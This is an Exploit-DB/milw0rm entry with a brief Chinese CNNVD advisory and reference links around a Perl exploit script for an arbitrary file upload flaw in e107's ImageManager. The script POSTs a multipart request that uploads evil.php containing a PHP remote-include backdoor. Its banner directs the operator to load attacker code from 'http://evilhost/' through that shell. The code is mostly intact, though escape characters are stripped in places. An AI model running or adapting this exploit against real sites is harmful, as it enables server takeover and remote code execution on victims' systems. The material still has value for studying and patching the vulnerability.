https://www.exploit-db.com/exploits/704
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200412-202

ImageManager在e1070.617之前的版本中不能正确地检查上传文件的类型，远程攻击者可以借助images.php的上传参数通过上传PHP文件来执行任意代码。

####################################################################
#
#  _____ _
# |  ___| | _____      ___
# | |_  | |/ _   / / /
# |  _| | | (_)  V  V /
# |_|   |_|___/ _/_/
#      Security Group.
#
#                    -=[ e107 remote sploit ]=-                           
#                           by sysbug 
#                              
# Attack method:                                                               
# with this sploit u can send an include() vuln to a Host victim  
# the upload go to /images/evil.php
#                                                                
# C:Perlbin>perl sploit.pl www.site.com                          
# -=[ e107 remote sploit ]=-                                      
#         by sysbug 
# # www.site.com
# # OWNED OH YEAH!                                                
# # get your evilc0de in:                                          
# # www.site.com/images/evil.php?owned=http://evilhost/ 
# C:Perlbin>                                                     
# 
# credits: ALL MY FRIENDS!                                                                 
# HELP ? RTFM -> perl sploit.pl                                                                
#####################################################################
use IO::Socket;

if(@ARGV < 1){
usage();
exit;
}
main();

sub main(){

print "-=[ e107 remote sploit ]=-n";
print "        by sysbug       nn";
$host[0] = $ARGV[0];
if($host[0] =~ ///){
($host[1],$host[2])=split(///,$host[0]);
$host[0] =~ //(.*)/;
$host[3] = "/";
$host[3] .= $1;
}
$host[1] = $host[0] if(!$host[1]);
@handlers =("e107_handlers","handlers");
print "# $host[1]n";
foreach $handler(@handlers){
$path = "$host[3]/$handler/htmlarea/popups/ImageManager/images.php";
$socket=IO::Socket::INET->new(Proto=>'tcp',PeerAddr=>$host[1],PeerPort=>80,Timeout=>10)|| die "  s0k offn";
print $socket "POST $path HTTP/1.1rn";
print $socket "Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*rn";
print $socket "Referer: http://www.lapropinacultural.com.ar/handlers/htmlarea/popups/insert_image.phprn";
print $socket "Accept-Language: ptrn";
print $socket "Content-Type: multipart/form-data; boundary=---------------------------7d410e113f8rn";
print $socket "Accept-Encoding: gzip, deflatern";
print $socket "User-Agent: l33t br0ws3rrn";
print $socket "Host: $host[1]rn";
print $socket "Content-Length: 1646rn";
print $socket "Connection: Keep-Alivernrn";
print $socket "-----------------------------7d410e113f8rn";
print $socket "Content-Disposition: form-data; name="dirPath"rnrn";
print $socket "/rn";
print $socket "-----------------------------7d410e113f8rn";
print $socket "Content-Disposition: form-data; name="url"rnrnrn";
print $socket "-----------------------------7d410e113f8rn";
print $socket "Content-Disposition: form-data; name="width"rnrnrn";
print $socket "-----------------------------7d410e113f8rn";
print $socket "Content-Disposition: form-data; name="vert"rnrnrn";
print $socket "-----------------------------7d410e113f8rn";
print $socket "Content-Disposition: form-data; name="alt"rnrnrn";
print $socket "-----------------------------7d410e113f8rn";
print $socket "Content-Disposition: form-data; name="height"rnrnrn";
print $socket "-----------------------------7d410e113f8rn";
print $socket "Content-Disposition: form-data; name="horiz"rnrnrn";
print $socket "-----------------------------7d410e113f8rn";
print $socket "Content-Disposition: form-data; name="upload"; filename="evil.php"rn";
print $socket "Content-Type: application/octet-streamrnrn";
print $socket "<? include($owned); ?>rn";
print $socket "-----------------------------7d410e113f8rn";
print $socket "Content-Disposition: form-data; name="align"rnrn";
print $socket "baselinern";
print $socket "-----------------------------7d410e113f8rn";
print $socket "Content-Disposition: form-data; name="border"rnrnrn";
print $socket "-----------------------------7d410e113f8rn";
print $socket "Content-Disposition: form-data; name="orginal_width"rnrnrn";
print $socket "-----------------------------7d410e113f8rn";
print $socket "Content-Disposition: form-data; name="orginal_height"rnrnrn";
print $socket "-----------------------------7d410e113f8rn";
print $socket "Content-Disposition: form-data; name="constrain_prop"rnrn";
print $socket "onrn";
print $socket "-----------------------------7d410e113f8rn";
print $socket "Content-Disposition: form-data; name="ok"rnrn";
print $socket "Refreshrn";
print $socket "-----------------------------7d410e113f8rn";
print $socket "Content-Disposition: form-data; name="ok"rnrn";
print $socket "OKrn";
print $socket "-----------------------------7d410e113f8rn";
print $socket "Content-Disposition: form-data; name="cancel"rnrn";
print $socket "Cancelrn";
print $socket "-----------------------------7d410e113f8--rnrnrnrn";
@socket = <$socket>;
foreach $teste(@socket){
if($teste=~ /<title>Image Browser</title>/){
print "# OWNED OH YEAH!n";
print "# get your evilc0de in: n# $host[0]/images/evil.php?owned=http://evilhost/n";
$result = 1;
}
}
close($socket);
}
if($result){
exit;
}
print "# b4d upload!!";
}
sub usage(){
print "-=[ e107 remote sploit ]=-n";
print "        by sysbug       nn";
print "# usage: perl $0 <host> n";
}

# milw0rm.com [2004-12-22]

来源:e107.org
链接:http://e107.org/comment.php?comment.news.672
来源:XF
名称:e107-images-file-upload(18670)
链接:http://xforce.iss.net/xforce/xfdb/18670
来源:BID
名称:12111
链接:http://www.securityfocus.com/bid/12111
来源:OSVDB
名称:12586
链接:http://www.osvdb.org/12586
来源:SECTRACK
名称:1012657
链接:http://securitytracker.com/id?1012657
来源:SECUNIA
名称:13657
链接:http://secunia.com/advisories/13657
来源:MILW0RM
名称:704
链接:http://milw0rm.com/exploits/704